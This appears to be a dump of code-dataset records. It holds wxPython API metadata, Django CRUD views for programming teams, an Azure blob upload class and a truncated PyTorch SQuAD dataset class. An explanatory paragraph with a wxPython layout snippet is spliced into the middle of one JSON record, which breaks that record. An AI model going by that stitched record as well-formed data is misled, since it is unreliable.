{"api_name": "wx.ID_ANY", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 25, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 30, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 33, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 33, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 34, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 36, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 39, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 41, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 44, 
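The panel above repeats one layout idiom many times: a StaticText label, a spacer, and a validated TextCtrl inside a horizontal BoxSizer. A minimal self-contained version of that idiom (RequiredValidator is the project's own class; any wx.Validator subclass slots in the same way, and the demo frame is illustrative):

import wx

def labelled_text_row(parent, label, validator=None):
    row = wx.BoxSizer(wx.HORIZONTAL)
    row.Add(wx.StaticText(parent, wx.ID_ANY, label), 0, wx.ALL, 5)
    row.AddSpacer(10)
    ctrl = wx.TextCtrl(parent, wx.ID_ANY, "",
                       validator=validator or wx.DefaultValidator)
    row.Add(ctrl, 1, wx.ALL | wx.EXPAND, 5)
    return row, ctrl

if __name__ == "__main__":
    app = wx.App(False)
    frame = wx.Frame(None, title="Row demo")
    panel = wx.Panel(frame)
    sizer = wx.BoxSizer(wx.VERTICAL)
    row, _ = labelled_text_row(panel, "First Name:")
    sizer.Add(row, 0, wx.EXPAND)
    panel.SetSizer(sizer)
    frame.Show()
    app.MainLoop()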
"usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 44, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 45, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 46, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 48, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 50, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 50, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 52, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 52, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 56, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 57, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 59, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 59, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 60, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 61, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 61, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 64, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 68, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 75, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 76, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 76, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 76, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 77, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 79, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 81, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 89, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 91, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 91, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 
93, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 93, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 95, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 95, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 97, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 100, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 103, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 103, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 104, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 106, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 109, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 111, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 111, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 113, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 113, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 114, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 116, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 118, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 121, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 121, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 122, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 122, "usage_type": "attribute"}, {"api_name": "src.wizard.controller.frmRequiredComboValidator.RequiredComboValidator", "line_number": 123, "usage_type": "call"}, {"api_name": "wx.Size", "line_number": 124, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 126, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 127, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 129, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 129, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 131, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 131, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 132, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 132, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 134, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 135, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 137, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 137, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 138, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 139, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 139, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 139, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 140, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 143, "usage_type": 
"attribute"}, {"api_name": "wx.BoxSizer", "line_number": 145, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 145, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 147, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 147, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 148, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 148, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 150, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 152, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 154, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 154, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 156, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 156, "usage_type": "call"}, {"api_name": "src.wizard.controller.frmRequiredValidator.RequiredValidator", "line_number": 156, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 157, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 159, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 164, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 166, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 170, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 170, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 171, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.TE_MULTILINE", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 175, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 177, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 177, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 179, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 179, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 186, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.EmptyString", "line_number": 187, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 188, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 191, 
"usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 195, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 198, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 200, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 202, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.DefaultSize", "line_number": 202, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 203, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 204, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.StdDialogButtonSizer", "line_number": 209, "usage_type": "call"}, {"api_name": "wx.Button", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 210, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 212, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 212, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 216, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 227, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 228, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 230, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 231, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 232, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 234, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 235, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 236, "usage_type": "call"}, {"api_name": "wx.TextCtrl", "line_number": 237, "usage_type": "call"}, {"api_name": "wx.FlexGridSizer", "line_number": 239, "usage_type": "call"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 242, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 242, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 243, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 245, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 246, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 248, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_RIGHT", "line_number": 251, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 251, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 253, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 253, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 255, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 257, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 259, "usage_type": "call"}, 
{"api_name": "wx.EXPAND", "line_number": 260, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 260, "usage_type": "attribute"}]} +{"seq_id": "548605758", "text": "# -*- coding: utf-8 -*-\nfrom crispy_forms.bootstrap import FormActions\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Fieldset, Div\nfrom crispy_forms.layout import Submit\nfrom django.core.urlresolvers import reverse, reverse_lazy\nfrom django.forms import ModelForm\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.generic import CreateView, UpdateView, DeleteView\n\nfrom myproject2016app.models.models import Programmer, Team\nfrom myproject2016app.util import paginate, get_current_group\n\n\n# Начальная Страницы Список Команд\ndef teams_list(request):\n\n current_team = get_current_group(request)\n\n if current_team:\n teams = Team.objects.filter(pk=current_team.id)\n else:\n teams = Team.objects.all()\n\n # teams = Team.objects.all()\n\n # try order for tems list\n ordered = request.GET.get('order_by', '')\n if ordered in ('name',):\n teams = teams.order_by(ordered)\n if request.GET.get('reverse', '') == '1':\n teams = teams.reverse()\n\n context = paginate(teams, 5, request, {}, var_name='teams')\n\n # # create pages whith pagonation\n # paginator = Paginator(teams, 4)\n # page = request.GET.get('page')\n # try:\n # teams = paginator.page(page)\n # except PageNotAnInteger:\n # # If page is not an integer, deliver first page.\n # teams = paginator.page(1)\n # except EmptyPage:\n # # If page is out of range (e.g. 9999), deliver last page of results.\n # teams = paginator.page(paginator.num_pages) # выводим последнюю страницу\n\n\n # teams_list = (\n # {'id': 1,\n # 'name': u'Феникс',\n # 'leader': {'id': 1, 'first_name': u'Юрий', 'last_name': u'Рынднин'},\n # },\n # {'id': 2,\n # 'name': u'Персей',\n # 'leader': {'id': 2, 'first_name': u'Виталий', 'last_name': u'Подоба'},\n # },\n # {'id': 3,\n # 'name': u'Локки',\n # 'leader': {'id': 3, 'first_name': u'Тараз', 'last_name': u'Шевченко'},\n # },\n # )\n programmers = Programmer.objects.all()\n\n return render(request, 'template_html/python_teams.html', context)\n\n\n# Шаблон Формы Создания Команды\n# через crispy_form\nclass TeamCreateForm(ModelForm):\n class Meta:\n # МетаДанные для Класса Модели определяются через Класс Мета // База данных // Выбор полей\n model = Team\n fields = Div('name', 'leader', 'notes')\n\n # логика при Инициализации Формы\n def __init__(self, *args, **kwargs):\n super(TeamCreateForm, self).__init__(*args, **kwargs)\n\n # Класс берется из Криспи_Формс\n self.helper = FormHelper(self)\n\n # Устанавливаем Свойства Тегов Формы -\n # прикручиваем к Классу Криспи_Формы\n self.helper.form_action = reverse_lazy('team_add', kwargs={})\n self.helper.form_method = 'POST'\n self.helper.form_class = 'form-horizontal'\n\n # Устанавливаем свойства Полей Формы\n self.helper.help_text_inline = True\n self.helper.html5_required = False\n self.helper.label_class = 'col-sm-3 control-label'\n self.helper.field_class = 'col-sm-6'\n\n self.helper.layout[:-1] = Fieldset('', 'name', 'leader', 'notes')\n self.helper.layout[-1] = FormActions(\n Submit('add_button', u'Добавить Команду в Базу', css_class=\"btn btn-primary\"),\n Submit('cancel_button', u'Отменить', css_class=\"btn btn-link\")\n )\n\n\n# Логика (Вьюшка) Формы Создания Команды\nclass TeamCreateView(CreateView):\n model = Team\n # fields = ['title', 'leader', 'notes']\n template_name = 'template_html/form_team.html'\n # 
success_url = '/groups/'\n form_class = TeamCreateForm\n\n def get_success_url(self):\n return u'%s?status_message=Команда Успешно Создана!' % reverse_lazy('teams')\n\n def post(self, request, *args, **kwargs):\n if request.POST.get('cancel_button'):\n return HttpResponseRedirect(u'%s?status_message=Создание Команды Отменено!'\n % (reverse('teams'))\n )\n # all the heavy lifting (validating the data, saving the Team,\n # preparing the errors for invalid input) is done for us by the\n # parent class's \"post\" method\n else:\n return super(TeamCreateView, self).post(request, *args, **kwargs)\n\n\n# def team_add(request):\n# return HttpResponse('
Its Add Team Page
')\n\n\n# Форма Редактирования Команды\nclass TeamUpdateForm(ModelForm):\n class Meta:\n model = Team\n fields = Div('name', 'leader', 'notes')\n\n def __init__(self, *args, **kwargs):\n super(TeamUpdateForm, self).__init__(*args, **kwargs)\n\n self.helper = FormHelper(self)\n\n self.helper.form_action = reverse('team_edit',\n kwargs={'pk': kwargs['instance'].id})\n self.helper.form_method = 'POST'\n self.helper.form_class = 'form-horizontal'\n\n self.helper.help_text_inline = True\n self.helper.html5_required = False\n self.helper.label_class = 'col-sm-3 control-label'\n self.helper.field_class = 'col-sm-6'\n\n self.helper.layout[:-1] = Fieldset('', 'name', 'leader', 'notes')\n self.helper.layout[-1] = FormActions(\n Submit('add_button', u'Сохранить Изменения', css_class='btn btn-primary'),\n Submit('cancel_button', u'Отменить', css_class='btn btn-link'),\n )\n\n\n# Логика Редактирования Программиста\nclass TeamUpdateView(UpdateView):\n model = Team\n template_name = 'template_html/team_edit.html'\n form_class = TeamUpdateForm\n # fields = '__all__'\n\n def get_success_url(self):\n return u'%s?status_message=Данные о Команде успешно Сохранены' % reverse('teams')\n\n def post(self, request, *args, **kwargs):\n if request.POST.get('cancel_button'):\n return HttpResponseRedirect(\n u'%s?status_message=Редактирование Данных о Команде Отменено' % reverse('teams') )\n else:\n return super(TeamUpdateView, self).post(request, *args, **kwargs)\n\n\n# Логика Удаления Команды\nclass TeamDeleteView(DeleteView):\n model = Team\n template_name = 'template_html/team_delete.html'\n\n def get_success_url(self):\n return u'%s?status_message=Команда успешно Удалена' % reverse('teams')\n# def team_edit(request, tid):\n# return HttpResponse('
Its Edit Team Page %s
' % tid)", "sub_path": "myproject2016app/views/pythonteams.py", "file_name": "pythonteams.py", "file_ext": "py", "file_size_in_byte": 7263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "myproject2016app.util.get_current_group", "line_number": 19, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 22, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Team.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 24, "usage_type": "name"}, {"api_name": "myproject2016app.util.paginate", "line_number": 35, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Programmer.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "myproject2016app.models.models.Programmer.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "myproject2016app.models.models.Programmer", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 71, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 74, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Div", "line_number": 75, "usage_type": "call"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 82, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 86, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Fieldset", "line_number": 96, "usage_type": "call"}, {"api_name": "crispy_forms.bootstrap.FormActions", "line_number": 97, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 98, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 99, "usage_type": "call"}, {"api_name": "django.views.generic.CreateView", "line_number": 104, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 105, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 112, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 116, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 117, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 131, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 133, "usage_type": "name"}, {"api_name": "crispy_forms.layout.Div", "line_number": 134, "usage_type": "call"}, {"api_name": "crispy_forms.helper.FormHelper", "line_number": 139, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 141, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Fieldset", "line_number": 151, "usage_type": "call"}, {"api_name": "crispy_forms.bootstrap.FormActions", "line_number": 152, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 153, "usage_type": "call"}, {"api_name": "crispy_forms.layout.Submit", "line_number": 154, "usage_type": "call"}, {"api_name": 
"django.views.generic.UpdateView", "line_number": 159, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 160, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 166, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 170, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 171, "usage_type": "call"}, {"api_name": "django.views.generic.DeleteView", "line_number": 177, "usage_type": "name"}, {"api_name": "myproject2016app.models.models.Team", "line_number": 178, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "233049647", "text": "import os\nfrom pathlib import Path\n\nfrom azure.storage.blob import BlockBlobService\n\n__all__ = ['AzureBlobUpload']\n\n\nclass AzureBlobUpload:\n \"\"\"\n Upload a file or a folder.\n \"\"\"\n\n def __init__(self, account_name: str, account_key: str, container_name: str):\n \"\"\"\n :param account_name:\n Azure storage account name.\n :param account_key:\n Azure storage key.\n :param container_name:\n Azure storage container name, URL will be added automatically.\n \"\"\"\n self.account_name = account_name\n self.account_key = account_key\n self.container_name = container_name\n\n self.block_blob_service = BlockBlobService(self.account_name, self.account_key)\n\n def upload_file(self, file_path: str, upload_to: str = None):\n \"\"\"\n Upload a file to a given blob path.\n\n :param upload_to:\n Give the path to upload.\n :param file_path:\n Absolute path of the file to upload.\n\n >>> from azblobexplorer import AzureBlobUpload\n >>> import os\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az.upload_file(os.path.join(here, 'file1.txt'), 'blob_folder/')\n \"\"\"\n\n path = Path(file_path)\n\n if upload_to is None:\n self.block_blob_service.create_blob_from_path(self.container_name, path.name, path)\n else:\n self.block_blob_service.create_blob_from_path(self.container_name,\n upload_to + path.name, path)\n\n def upload_files(self, files_path: list):\n \"\"\"\n Upload a list of files.\n\n :param list files_path:\n A list of files to upload.\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> path_list = [\n ... [os.path.join(here, 'file1.txt'), 'folder_1/'],\n ... [os.path.join(here, 'file2.txt'), 'folder_2/'],\n ... os.path.join(here, 'file3.txt')\n ... ]\n >>> az.upload_files(path_list)\n \"\"\"\n\n for path in files_path:\n if isinstance(path, list):\n self.upload_file(path[0], path[1])\n else:\n self.upload_file(path)\n\n def upload_folder(self, folder_path: str, upload_to: str = None):\n \"\"\"\n Upload a folder to a given blob path.\n\n :param upload_to:\n Give the path to upload. 
Default ``None``.\n :param folder_path:\n Absolute path of the folder to upload.\n\n **Example without \"upload_to\"**\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> az.upload_folder(os.path.join(here, 'folder_name'))\n\n **Example with \"upload_to\"**\n\n >>> import os\n >>> from azblobexplorer import AzureBlobUpload\n >>> here = os.path.abspath(os.path.dirname(__file__)) + os.sep\n >>> az = AzureBlobUpload('account name', 'account key', 'container name')\n >>> az.upload_folder(os.path.join(here, 'folder_name'), upload_to=\"my/blob/location/\")\n \"\"\"\n\n path = Path(folder_path)\n\n if not path.is_dir():\n raise TypeError(\"The path should be a folder.\")\n\n root_name = path.name\n\n for _dir, _, files in os.walk(path):\n for file_name in files:\n rel_dir = os.path.relpath(_dir, path)\n rel_folder_path = os.path.join(root_name, rel_dir) + '/'\n abs_path = os.path.join(_dir, file_name)\n if upload_to is None:\n self.upload_file(abs_path, rel_folder_path)\n else:\n self.upload_file(abs_path, upload_to + rel_folder_path)\n", "sub_path": "azblobexplorer/upload.py", "file_name": "upload.py", "file_ext": "py", "file_size_in_byte": 4127, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "azure.storage.blob.BlockBlobService", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 104, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}]} +{"seq_id": "475643212", "text": "import torch\nimport numpy as np\nfrom torch.utils.data.dataset import Dataset\nclass SquadPytorchDataset(Dataset):\n def __init__(self, squad_emb):\n self.squad_emb = squad_emb\n\n def __len__(self):\n return len(self.squad_emb.datapoints)\n\n def __getitem__(self, idx):\n\n qa_id = self.squad_emb.get_id(idx)\n\n context_word_emb = 